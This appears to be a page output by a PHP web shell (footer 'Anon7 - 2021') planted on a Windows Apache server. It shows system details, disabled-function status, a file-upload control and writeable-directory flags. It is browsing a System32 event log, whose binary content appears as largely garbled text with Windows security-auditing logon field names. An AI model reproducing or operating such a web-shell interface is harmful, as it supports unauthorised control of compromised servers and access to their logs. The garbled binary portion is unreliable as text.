KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT SERVER-PC 10.0 build 26200 (Windows 11) AMD64
User : ServerPC ( 0)
PHP Version : 8.2.12
Disable Function : NONE
Directory :  C:/Windows/System32/winevt/Logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : C:/Windows/System32/winevt/Logs/Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
ElfFile�Fi��ElfChnk��������������������������Ȱn**p����\g���1�&��1��a�P��=׆[�A~M�Event�j�xmlns5http://schemas.microsoft.com/win/2004/08/events/event����oTSystemA��Y�{Provider6F=K�NameX)GuidAMz�aEventID'�X)�
Qualifiers"�	Version�d�LevelE{Task ?�Opcode$fj�KeywordsA��P�;�TimeCreated'�j<{
SystemTime
.�F
EventRecordID

A�����Correlation\FF
�
ActivityIDmz5�RelatedActivityID
A��m���	ExecutionHF�F
�	ProcessID��9ThreadID	"�aChannel��6F�;nComputer	Server-PCA��B��.Security�fLUserID!
F�!1 ���\g��	��mdP
��md�����Microsoft-Windows-Security-Auditing%��TxT�I��>;(�
Security�`�n��`�n���X��I�������D�	EventDataA��E��oData%=SubjectUserSid
A��5'=SubjectUserName
A��9+=SubjectDomainName
A��3%=SubjectLogonId
A��1#=
TargetUserSid
A��3%=TargetUserName
A��7)=TargetDomainName
A��1#=
TargetLogonId
A��)=	LogonType
A��7)=LogonProcessName
	A��I;=AuthenticationPackageName
A��5'=WorkstationName
A��)=	LogonGuid
A��=/=TransmittedServices

A��1#=
LmPackageName
A��)=	KeyLength
A��)=	ProcessId
A��-=ProcessName
A��)=	IpAddress
A��#=IpPort
A��;-=ImpersonationLevel
A��=/=RestrictedAdminMode
A��A3=RemoteCredentialGuard
A��C5=TargetOutboundUserName
A��G9=TargetOutboundDomainName
A��3%=VirtualAccount
A��=/=TargetLinkedLogonId
A��1#=
ElevatedToken
BSERVER-PC$WORKGROUP�SYS

Anon7 - 2021